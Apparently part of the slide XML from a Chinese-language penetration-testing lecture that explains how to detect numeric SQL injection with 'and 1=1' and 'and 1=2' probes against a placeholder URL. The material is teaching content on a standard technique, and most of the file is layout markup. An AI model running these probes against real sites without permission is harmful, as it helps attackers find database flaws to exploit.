                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>id=8</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>and 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句执行正常</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>返回数据与原始 请求无任何差异。</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="150495" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="151130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>HTTP://www.xxser.com/test.php?id=8 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1=2</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="314960" marR="15240" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="75800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="245"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="315595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>where id=8</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1=2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句执行正常</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>但却无法查询出数 据，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1=2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>始终为假，所以返回数据与原始请求有差异。</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="150495" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="151130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>如果以上三个步骤全部满足，则程序就可能存在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入漏洞。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454029" y="2822367"/>
            <a:ext cx="3155950" cy="135890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="15240" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>这种数字型注入较多出现在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>等弱类型语言中，弱类型语言会自动推导</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591953" y="2898571"/>
            <a:ext cx="459740" cy="135890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="15240" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>变量类型。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755027" y="907541"/>
            <a:ext cx="4371975" cy="2453005"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4371975" h="2453004">
                <a:moveTo>
                  <a:pt x="4371594" y="2452878"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4371594" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2452878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4371594" y="2452878"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12954">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>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zc0_0</dc:creator>
  <dc:title>Microsoft PowerPoint - 4.7渗透性测试.pptx</dc:title>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-20T12:45:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-20T12:45:25Z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2022-05-17T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>PScript5.dll Version 5.2.2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2022-05-20T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>